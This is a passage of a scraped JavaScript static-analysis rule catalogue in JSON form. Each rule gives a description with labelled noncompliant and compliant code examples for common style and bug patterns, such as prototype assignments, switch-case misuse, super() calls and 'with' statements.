bodies.","defaultValue":"false","type":"BOOLEAN"},{"key":"parameter_parens","htmlDesc":"True to require parentheses around parameters. False to forbid them for single parameter.","defaultValue":"false","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"javascript:S3525","repo":"javascript","name":"Class methods should be used instead of \"prototype\" assignments","htmlDesc":"<p>Originally JavaScript didn't support <code>class<\/code>es, and class-like behavior had to be kludged using things like <code>prototype<\/code>\nassignments for \"class\" functions. Fortunately, ECMAScript 2015 added classes, so any lingering <code>prototype<\/code> uses should be converted to\ntrue <code>class<\/code>es. The new syntax is more expressive and clearer, especially to those with experience in other languages.<\/p>\n<p>Specifically, with ES2015, you should simply declare a <code>class<\/code> and define its methods inside the class declaration.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyNonClass(initializerArgs = []) {\n this._values = [...initializerArgs];\n}\n\nMyNonClass.prototype.doSomething = function () { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n constructor(initializerArgs = []) {\n this._values = [...initializerArgs];\n }\n\n doSomething() {\n \/\/...\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3533","repo":"javascript","name":"\"import\" should be used to include external code","htmlDesc":"<p>Before ECMAScript 2015, module management had to be ad-hoc or provided by 3rd-party libraries such as Node.js, Webpack, or RequireJS. Fortunately,\nES2015, provides language-standard mechanisms for module management, <code>import<\/code> and <code>export<\/code>, and older usages should be\nconverted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ circle.js\nexports.area = function (r) {\n return PI * r * r;\n};\n\n\/\/ foo.js\ndefine([\".\/cart\", \".\/horse\"], function(cart, horse) { \/\/ Noncompliant\n \/\/ ...\n});\n\n\/\/ bar.js\nconst circle = require('.\/circle.js'); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ circle.js\nlet area = function (r) {\n return PI * r * r;\n}\nexport default area;\n\n\/\/ foo.js\nimport cart from \".\/cart.js\";\nimport horse from \".\/horse.js\";\n\n\/\/ bar.js\nimport circle from \".\/circle.js\"\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3579","repo":"javascript","name":"Array indexes should be numeric","htmlDesc":"<p>JavaScript is flexible enough to allow you to store values in an array with either numeric or named indexes. That is, it supports associative\narrays. But creating and populating an object in JavaScript is just as easy as an array, and more reliable if you need named members.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet arr = [];\narr[0] = 'a';\narr['name'] = 'bob'; \/\/ Noncompliant\narr[1] = 'foo';\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet obj = {\n name: 'bob',\n arr: ['a', 'foo']\n};\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3616","repo":"javascript","name":"Comma and logical OR operators should not be used in switch cases","htmlDesc":"<p>The comma operator (<code>,<\/code>) evaluates its operands, from left to right, and returns the second one. That's useful in some situations, but\njust wrong in a <code>switch<\/code> <code>case<\/code>. You may think you're compactly handling multiple values in the case, but only the last one in\nthe comma-list will ever be handled. The rest will fall through to the default.<\/p>\n<p>Similarly the logical OR operator (<code>||<\/code>) will not work in a <code>switch<\/code> <code>case<\/code>, only the first argument will be\nconsidered at execution time.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch a {\n case 1,2: \/\/ Noncompliant; only 2 is ever handled by this case\n doTheThing(a);\n case 3 || 4: \/\/ Noncompliant; only '3' is handled\n doThatThing(a);\n case 5:\n doTheOtherThing(a);\n default:\n console.log(\"Neener, neener!\"); \/\/ this happens when a==1 or a == 4\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch a {\n case 1:\n case 2:\n doTheThing(a);\n case 3:\n case 4:\n doThatThing(a);\n case 5:\n doTheOtherThing(a);\n default:\n console.log(\"Neener, neener!\");\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3686","repo":"javascript","name":"Functions should not be called both with and without \"new\"","htmlDesc":"<p>Constructor functions, which create new object instances, must only be called with <code>new<\/code>. Non-constructor functions must not. Mixing\nthese two usages could lead to unexpected results at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction getNum() {\n return 5;\n}\n\nfunction Num(numeric, alphabetic) {\n this.numeric = numeric;\n this.alphabetic = alphabetic;\n}\n\nvar myFirstNum = getNum();\nvar my2ndNum = new getNum(); \/\/ Noncompliant. An empty object is returned, NOT 5\n\nvar myNumObj1 = new Num();\nvar myNumObj2 = Num(); \/\/ Noncompliant. undefined is returned, NOT an object\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3699","repo":"javascript","name":"The output of functions that don't return anything should not be used","htmlDesc":"<p>If a function does not return anything, it makes no sense to use its output. Specifically, passing it to another function, or assigning its\n\"result\" to a variable is probably a bug because such functions return <code>undefined<\/code>, which is probably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n}\n\na = foo();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo() {\n}\n\nfoo();\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3735","repo":"javascript","name":"\"void\" should not be used","htmlDesc":"<p>The <code>void<\/code> operator evaluates its argument and unconditionally returns <code>undefined<\/code>. It can be useful in pre-ECMAScript 5\nenvironments, where <code>undefined<\/code> could be reassigned, but generally, its use makes code harder to understand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvoid (function() {\n ...\n}());\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n(function() {\n ...\n}());\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>void 0<\/code> is used in place of <code>undefined<\/code>. <\/p>\n<pre>\nif (parameter === void 0) {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3758","repo":"javascript","name":"Values not convertible to numbers should not be used in numeric comparisons","htmlDesc":"<p>In a Zen-like manner, <code>NaN<\/code> isn't equal to anything, even itself. So comparisons (<code>>, <, >=, <=<\/code>) where one\noperand is <code>NaN<\/code> or evaluates to <code>NaN<\/code> always return <code>false<\/code>. Specifically, <code>undefined<\/code> and objects that\ncannot be converted to numbers evaluate to <code>NaN<\/code> when used in numerical comparisons.<\/p>\n<p>This rule raises an issue when there is at least one path through the code where one of the operands to a comparison is <code>NaN<\/code>,\n<code>undefined<\/code> or an <code>Object<\/code> which cannot be converted to a number.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x; \/\/ x is currently \"undefined\"\nif (someCondition()) {\n x = 42;\n}\n\nif (42 > x) { \/\/ Noncompliant; \"x\" might still be \"undefined\"\n doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj > 24) { \/\/ Noncompliant\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x;\nif (someCondition()) {\n x = 42;\n} else {\n x = foo();\n}\n\nif (42 > x) {\n doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj.prop > 24) {\n doSomething();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3776","repo":"javascript","name":"Cognitive Complexity of functions should not be too high","htmlDesc":"<p>Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be\ndifficult to maintain.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/redirect.sonarsource.com\/doc\/cognitive-complexity.html\">Cognitive Complexity<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"threshold","htmlDesc":"The maximum authorized complexity.","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S3782","repo":"javascript","name":"Arguments to built-in functions should match documented types","htmlDesc":"<p>The types of the arguments to built-in functions are specified in the JavaScript language specifications. Calls to these functions should conform\nto the documented types, otherwise the result will most likely not be what was expected (e.g.: the call would always return <code>false<\/code>).<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x < 0.0042);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x) < 0.0042;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3785","repo":"javascript","name":"\"in\" should not be used with primitive types","htmlDesc":"<p>The <code>in<\/code> operator tests whether the specified property is in the specified object.<\/p>\n<p>If the right operand is a of primitive type (i.e., not an object) the <code>in<\/code> operator raises a <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = \"Foo\";\n\"length\" in x; \/\/ Noncompliant: TypeError\n0 in x; \/\/ Noncompliant: TypeError\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = new String(\"Foo\");\n\"length\" in x; \/\/ true\n0 in x; \/\/ true\n\"foobar\" in x; \/\/ false\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3786","repo":"javascript","name":"Template literal placeholder syntax should not be used in regular strings","htmlDesc":"<p>JavaScript allows developers to embed variables or expressions in strings using template literals, instead of string concatenation. This is done by\nusing expressions like <code>${variable} <\/code> in a string between two back-ticks (<code>`<\/code>).<\/p>\n<p>When used in a regular string literal (between double or single quotes) the template will not be evaluated and will be used as a literal, which is\nprobably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(\"Today is ${date}\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconsole.log(`Today is ${date}`);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3796","repo":"javascript","name":"Callbacks of array methods should have return statements","htmlDesc":"<p>Arrays in JavaScript have several methods for filtering, mapping or folding that require a callback. Not having a return statement in such a\ncallback function is most likely a mistake.<\/p>\n<p>This rule applies for the following methods of an array:<\/p>\n<ul>\n <li> <code>Array.from<\/code> <\/li>\n <li> <code>Array.prototype.every<\/code> <\/li>\n <li> <code>Array.prototype.filter<\/code> <\/li>\n <li> <code>Array.prototype.find<\/code> <\/li>\n <li> <code>Array.prototype.findIndex<\/code> <\/li>\n <li> <code>Array.prototype.map<\/code> <\/li>\n <li> <code>Array.prototype.reduce<\/code> <\/li>\n <li> <code>Array.prototype.reduceRight<\/code> <\/li>\n <li> <code>Array.prototype.some<\/code> <\/li>\n <li> <code>Array.prototype.sort<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n a.concat(b);\n}); \/\/ Noncompliant: No return statement\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n return a.concat(b);\n});\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3799","repo":"javascript","name":"Destructuring patterns should not be empty","htmlDesc":"<p>Destructuring is a convenient way of extracting multiple values from data stored in (possibly nested) objects and arrays. However, it is possible\nto create an empty pattern that has no effect. When empty curly braces or brackets are used to the right of a property name most of the time the\nintent was to use a default value instead.<\/p>\n<p>This rule raises an issue when empty destructuring pattern is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar {a: {}, b} = myObj; \/\/ Noncompliant\nfunction foo({first: [], second}) { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar {a = {}, b} = myObj;\nfunction foo({first = [], second}) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3828","repo":"javascript","name":"\"yield\" expressions should not be used outside generators","htmlDesc":"<p>The <code>yield<\/code> keyword is used in a generator function to return an <code>IteratorResult<\/code> to the caller. It has no other purpose, and\nif found outside such a function will raise a <code>ReferenceError<\/code> because it is then treated as an identifier.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n for (var i = 0; i < 5; i++) {\n yield i * 2;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction * foo() {\n for (var i = 0; i < 5; i++) {\n yield i * 2;\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3834","repo":"javascript","name":"\"Symbol\" should not be used as a constructor","htmlDesc":"<p><code>Symbol<\/code> is a primitive type introduced in ECMAScript2015. Its instances are mainly used as unique property keys.<\/p>\n<p>An instance can only be created by using <code>Symbol<\/code> as a function. Using <code>Symbol<\/code> with the <code>new<\/code> operator will raise\na <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst sym = new Symbol(\"foo\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst sym = Symbol(\"foo\");\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3854","repo":"javascript","name":"super() should be invoked appropriately","htmlDesc":"<p>There are situations where <code>super()<\/code> must be invoked and situations where <code>super()<\/code> cannot be invoked.<\/p>\n<p>The basic rule is: a constructor in a non-derived class cannot invoke <code>super()<\/code>; a constructor in a derived class must invoke\n<code>super()<\/code>.<\/p>\n<p>Furthermore:<\/p>\n<p>- <code>super()<\/code> must be invoked before the <code>this<\/code> and <code>super<\/code> keywords can be used.<\/p>\n<p>- <code>super()<\/code> must be invoked with the same number of arguments as the base class' constructor.<\/p>\n<p>- <code>super()<\/code> can only be invoked in a constructor - not in any other method.<\/p>\n<p>- <code>super()<\/code> cannot be invoked multiple times in the same constructor.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Animal {\n constructor() {\n super(); \/\/ Noncompliant, super() cannot be invoked in a base class\n }\n\n doSomething() {\n }\n}\n\nclass Dog extends Animal {\n constructor(name) {\n this.name = name;\n super.doSomething();\n super(); \/\/ Noncompliant, super() must be invoked before \"this\" or \"super\" is used\n }\n\n doSomething() {\n super(); \/\/ Noncompliant, super() cannot be invoked outside of a constructor\n }\n}\n\nclass Labrador extends Dog {\n constructor(name) {\n super(); \/\/ Noncompliant, super() must be invoked with one argument\n }\n}\n\nclass GermanShepherd extends Dog {\n constructor(name) {\n } \/\/ Noncompliant, super() must be invoked in constructor of derived class\n}\n\nclass FilaBrasileiro extends Dog {\n constructor(name) {\n super(name);\n super(name); \/\/ Noncompliant, super() can only be invoked once\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Animal {\n constructor() {\n }\n\n doSomething() {\n }\n}\n\nclass Dog extends Animal {\n constructor(name) {\n super();\n this.name = name;\n super.doSomething();\n }\n\n doSomething() {\n }\n}\n\nclass Labrador extends Dog {\n constructor(name) {\n super(name);\n }\n}\n\nclass GermanShepherd extends Dog {\n constructor(name) {\n super(name);\n }\n}\n\nclass FilaBrasileiro extends Dog {\n constructor(name) {\n super(name);\n }\n}\n<\/pre>\n<h2>Known Limitations<\/h2>\n<ul>\n <li>False negatives: some issues are not raised if the base class is not defined in the same file as the current class.<\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3923","repo":"javascript","name":"All branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having all branches in a <code>switch<\/code> or <code>if<\/code> chain with the same implementation is an error. Either a copy-paste error was made\nand something different should be executed, or there shouldn't be a <code>switch<\/code>\/<code>if<\/code> chain at all. Note that this rule does not\napply to <code>if<\/code> chains without <code>else<\/code>s, or to <code>switch<\/code>es without <code>default<\/code> clauses.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (b == 0) { \/\/ Noncompliant\n doOneMoreThing();\n}\nelse {\n doOneMoreThing();\n}\n\nlet a = (b == 0) ? getValue() : getValue(); \/\/ Noncompliant\n\nswitch (i) { \/\/ Noncompliant\n case 1:\n doSomething();\n break;\n case 2:\n doSomething();\n break;\n case 3:\n doSomething();\n break;\n default:\n doSomething();\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S888","repo":"javascript","name":"Equality operators should not be used in \"for\" loop termination conditions","htmlDesc":"<p>Testing <code>for<\/code> loop termination using an equality operator (<code>==<\/code> and <code>!=<\/code>) is dangerous, because it could set up an\ninfinite loop. Using a broader relational operator instead casts a wider net, and makes it harder (but not impossible) to accidentally write an\ninfinite loop.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 1; i != 10; i += 2) \/\/ Noncompliant. Infinite; i goes from 9 straight to 11.\n{\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 1; i <= 10; i += 2) \/\/ Compliant\n{\n \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Equality operators are ignored if the loop counter is not modified within the body of the loop and either:<\/p>\n<ul>\n <li> starts below the ending value and is incremented by 1 on each iteration. <\/li>\n <li> starts above the ending value and is decremented by 1 on each iteration. <\/li>\n<\/ul>\n<p>Equality operators are also ignored when the test is against <code>null<\/code>.<\/p>\n<pre>\nfor (var i = 0; arr[i] != null; i++) {\n \/\/ ...\n}\n\nfor (var i = 0; (item = arr[i]) != null; i++) {\n \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 6-5-2 <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/835\">MITRE, CWE-835<\/a> - Loop with Unreachable Exit Condition ('Infinite Loop') <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/EwDJAQ\">CERT, MSC21-C.<\/a> - Use robust loop termination conditions <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/GwDJAQ\">CERT, MSC21-CPP.<\/a> - Use inequality to terminate a loop whose counter changes\n by more than one <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:StrictMode","repo":"javascript","name":"\"strict\" mode should be used with caution","htmlDesc":"<p>Even thought it may be a good practice to enforce JavaScript strict mode, doing so could result in unexpected behaviors on browsers that do not\nsupport it yet. Using this feature should therefore be done with caution and with full knowledge of the potential consequences on browsers that do not\nsupport it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction strict() {\n 'use strict';\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:SwitchWithoutDefault","repo":"javascript","name":"\"switch\" statements should end with \"default\" clauses","htmlDesc":"<p>The requirement for a final <code>default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain a\nsuitable comment as to why no action is taken.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (param) { \/\/missing default clause\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n}\n\nswitch (param) {\n default: \/\/ default clause should be the last one\n error();\n break;\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (param) {\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n default:\n error();\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:UnusedVariable","repo":"javascript","name":"Unused local variables and functions should be removed","htmlDesc":"<p>If a local variable or a local function is declared but not used, it is dead code and should be removed. Doing so will improve maintainability\nbecause developers will not wonder what the variable or function is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n var seconds = 0; \/\/ seconds is never used\n return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:VariableShadowing","repo":"javascript","name":"Variables should not be shadowed","htmlDesc":"<p>Overriding a variable declared in an outer scope can strongly impact the readability, and therefore the maintainability, of a piece of code.\nFurther, it could lead maintainers to introduce bugs because they think they're using one variable but are really using another.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nshow: function(point, element) {\n if (!this.drops.length) return;\n var drop, affected = [];\n this.drops.each( function(drop) { \/\/ Non-Compliant; defines a new 'drop' parameter\n if(Droppables.isAffected(point, element, drop))\n affected.push(drop);\n });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nshow: function(point, element) {\n if (!this.drops.length) return;\n var drop, affected = [];\n this.drops.each( function(aDrop) {\n if(Droppables.isAffected(point, element, aDrop))\n affected.push(aDrop);\n });\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 5.2 - Identifiers in an inner scope shall not use the same name as an identifier in an outer scope, and therefore hide that\n identifier <\/li>\n <li> MISRA C++:2008, 2-10-2 - Identifiers declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n <li> MISRA C:2012, 5.3 - An identifier declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/VwE\">CERT, DCL01-C.<\/a> - Do not reuse variable names in subscopes <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/cwAhAQ\">CERT, DCL01-CPP.<\/a> - Do not reuse variable names in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:WithStatement","repo":"javascript","name":"\"with\" statements should not be used","htmlDesc":"<p>The use of the <code>with<\/code> keyword produces an error in JavaScript strict mode code. However, that's not the worst that can be said against\n<code>with<\/code>.<\/p>\n<p>Using <code>with<\/code> allows a short-hand access to an object's properties - assuming they're already set. But use <code>with<\/code> to access\nsome property not already set in the object, and suddenly you're catapulted out of the object scope and into the global scope, creating or overwriting\nvariables there. Since the effects of <code>with<\/code> are entirely dependent on the object passed to it, <code>with<\/code> can be dangerously\nunpredictable, and should never be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n y: 1\n}\n\nwith (foo) { \/\/ Noncompliant\n y = 4; \/\/ updates foo.x\n x = 3; \/\/ does NOT add a foo.x property; updates x var in outer scope\n}\nprint(foo.x + \" \" + x); \/\/ shows: undefined 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n y: 1\n}\n\nfoo.y = 4;\nfoo.x = 3;\n\nprint(foo.x + \" \" + x); \/\/ shows: 3 a\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"}],"language":"js","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};- Exclude checks
BUG found Open
Open
window.data = {"total":92,"p":1,"ps":500,"rules":[{"key":"common-js:InsufficientBranchCoverage","repo":"common-js","name":"Branches should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the branch coverage on this file is less than the required threshold.It gives the number of branches to be covered in order to reach the required threshold.","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"minimumBranchCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"javascript:ArrayAndObjectConstructors","repo":"javascript","name":"Array constructors should not be used","htmlDesc":"<p>Array literals should always be preferred to Array constructors.<\/p>\n<p>Array constructors are error-prone due to the way their arguments are interpreted. If more than one argument is used, the array length will be\nequal to the number of arguments. However, using a single argument will have one of three consequences:<\/p>\n<ul>\n <li> If the argument is a number and it is a natural number the length will be equal to the value of the argument. <\/li>\n <li> If the argument is a number, but not a natural number an exception will be thrown. <\/li>\n <li> Otherwise the array will have one element with the argument as its value. <\/li>\n<\/ul>\n<p>For these reasons, if someone changes the code to pass 1 argument instead of 2 arguments, the array might not have the expected length. To avoid\nthese kinds of weird cases, always use the more readable array.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a1 = new Array(x1, x2, x3); \/\/ Noncompliant. Results in 3-element array.\nvar a2 = new Array(x1); \/\/ Noncompliant and variable in results\nvar a3 = new Array(); \/\/ Noncompliant. Results in 0-element array.\n\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar a1 = [x1, x2, x3];\nvar a2 = [x1];\nvar a3 = [];\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:AssignmentWithinCondition","repo":"javascript","name":"Assignments should not be made from within sub-expressions","htmlDesc":"<p>Assignments within sub-expressions are hard to spot and therefore make the code less readable. Ideally, sub-expressions should not have\nside-effects.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ((str = cont.substring(pos1, pos2)) != '') { \/\/ Noncompliant\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstr = cont.substring(pos1, pos2);\nif (str != '') {\n \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Assignments in <code>while<\/code> statement conditions, and assignments enclosed in relational expressions are allowed.<\/p>\n<pre>\nwhile ((line = nextLine()) != null) {...} \/\/ Compliant\n\nwhile (line = nextLine()) {...} \/\/ Compliant\n\nif (line = nextLine()) {...} \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.1 - Assignment operators shall not be used in expressions that yield a Boolean value <\/li>\n <li> MISRA C++:2008, 6-2-1 - Assignment operators shall not be used in sub-expressions <\/li>\n <li> MISRA C:2012, 13.4 - The result of an assignment operator should not be used <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/481.html\">MITRE, CWE-481<\/a> - Assigning instead of Comparing <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/nYFtAg\">CERT, EXP45-C.<\/a> - Do not perform assignments in selection statements <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1gCTAw\">CERT, EXP51-J.<\/a> - Do not perform assignments in conditional expressions\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KQvhAg\">CERT, EXP19-CPP.<\/a> - Do not perform assignments in conditional expressions\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KYIyAQ\">CERT, MSC02-CPP.<\/a> - Avoid errors of omission <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:BitwiseOperators","repo":"javascript","name":"Bitwise operators should not be used in boolean contexts","htmlDesc":"<p>The bitwise operators <code>&<\/code>, <code>|<\/code> can be mistaken for the boolean operators <code>&&<\/code> and <code>||<\/code>.\n<\/p>\n<p>This rule raises an issue when <code>&<\/code> or <code>|<\/code> is used in a boolean context.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (a & b) { ... } \/\/ Noncompliant; & used in error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (a && b) { ... }\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a file contains other bitwise operations, (<code>^<\/code>, <code><<<\/code>, <code>>>><\/code>, <code>>><\/code>,\n<code>~<\/code>, <code>&=<\/code>, <code>^=<\/code>, <code>|=<\/code>, <code><<=<\/code>, <code>>>=<\/code>, <code>>>>=<\/code> and\n<code>&<\/code> or <code>|<\/code> used with a numeric literal as the right operand) all issues in the file are ignored, because it is evidence that\nbitwise operations are truly intended in the 